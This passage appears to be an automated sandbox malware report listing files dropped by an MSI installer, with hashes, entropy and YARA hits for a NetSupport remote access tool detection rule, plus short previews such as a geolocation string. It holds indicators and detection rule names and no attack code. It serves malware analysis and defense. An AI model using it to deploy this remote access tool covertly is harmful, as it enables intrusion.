                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2435.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2465.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2485.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI24C5.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2504.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI25E0.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2610.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI264F.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI291F.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4973337
                                                                                                                    Entropy (8bit):6.519265869086554
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:KgAesgAelgAeHcqMOfhR2cqMOfERhgAeAcqMOf3:KOsOlOE4hn4E/O/43
                                                                                                                    MD5:E5D8B0B632DB7008A4E150523EAB7EF3
                                                                                                                    SHA1:C70BD838087CA59A944749D35B8E2544D3EA9569
                                                                                                                    SHA-256:37918BEB4108451977C8F97E3F79F28FE10176F925CEAA4407F0C795CC301F57
                                                                                                                    SHA-512:EE17EDDCDB64D4C8767FC8E2D646AFDC505F5AD8A28F28B9CB2F3813B0D89655F898B56C717DD490684DA0F3F6A3611D0AE768806974E76C7A5CCF1609CB4E21
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI294F.tmp, Author: Joe Security
                                                                                                                    Preview:...@IXOS.@.....@.vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopDrivers....J...StopDrivers.@A.........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rda
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B06.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B65.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B95.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2BE4.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI3FCC.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51A0.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51C1.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):173816
                                                                                                                    Entropy (8bit):6.23179846686102
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                                                    MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                                                    SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                                                    SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                                                    SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI6963.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):20480
                                                                                                                    Entropy (8bit):1.161422720662984
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:JSbX72FjiAGiLIlHVRpzh/7777777777777777777777777vDHFVBfHIxVYOp01z:J4QI53hoxyN8F
                                                                                                                    MD5:CD7AB3DEB405264AAA93C9CD98F2C426
                                                                                                                    SHA1:E274F2E9E3D997D8FF344DB0B056F994D32ECC05
                                                                                                                    SHA-256:74D3D772C9B7174FC3702D7835F3C2D0F61F46BD07CBC5306A03541FE9485881
                                                                                                                    SHA-512:C79294A0FD7D98FBEC8ACB0EC41601B456BBDF89D89D9DF238CFE3DDBA36472365C71E290671793EC61C9229908002E194C3C8B29C4F4987F6458043DE242E35
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24576
                                                                                                                    Entropy (8bit):2.2099910368114806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:ZhU1FFTFPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:Y1nxy4cLOUCfKMPqYw
                                                                                                                    MD5:028B4FDBCF2D91D3D240605C8D70EFF1
                                                                                                                    SHA1:C37412C478219DE8E590CBBCD7DBF89A41A919F2
                                                                                                                    SHA-256:6A89784930F481E9BC67FD4A3D734AB813F742288512BB52C15455356B89110A
                                                                                                                    SHA-512:5CC5A3A014804F5CB74D5FD0BF1AE45AB920417A8DDB3784A70F16C7B1E6C0C8EBF7A08B113FD46414D16F6DDAF32B3A349A5CB4D28E048A30087E03A4ADAB70
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):144128
                                                                                                                    Entropy (8bit):4.98417021664642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:DMAyYdTmPJbgqcnDcVVZl6FhWr80/35qr2pe/kyNAMxkEe:D1U81c50hGv5Kee/k4x6
                                                                                                                    MD5:EEA96B9571108A588FB0DBC47DB9F8BE
                                                                                                                    SHA1:3DD69D11C3023FDD9429658BA25995950781E575
                                                                                                                    SHA-256:D324F2C1E8697197152BC2E4E8AA67F8660B3B93887A754AEC81791377EF1045
                                                                                                                    SHA-512:760749F298E7E2C8E081B4A436EA1185B6366E53A5B91640061EA73A9C0AC33AB385BD0588B9886F80F695B297BA46FFC58B3BDE0DD2BC9AEA127FDDCBC0C624
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):432221
                                                                                                                    Entropy (8bit):5.375163522455423
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauH:zTtbmkExhMJCIpEri
                                                                                                                    MD5:3F57B0D0EF35DE5C471C74A8B9DA62E8
                                                                                                                    SHA1:EEBCF9BAD94E334337EF4D1DBB7732F16C0964C5
                                                                                                                    SHA-256:DD017137AD6183B8F4DC53E30047C42CDF0C70C634E39F752547104580BC8521
                                                                                                                    SHA-512:F6B038DCEBD0575658C9BEECB7B7338FECEBC4BD32DFE18494DDF524D224190701A088821CF5EDA22945FE6C12D01CF5B266A36EEDFFFAEE185F37ED250C5500
                                                                                                                    Malicious:false
                                                                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16
                                                                                                                    Entropy (8bit):3.077819531114783
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:llD:b
                                                                                                                    MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                                    SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                                    SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                                    SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                                    Malicious:true
                                                                                                                    Preview:40.7357,-74.1724
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):56288
                                                                                                                    Entropy (8bit):5.934323135362062
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                                                    MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                                                    SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                                                    SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
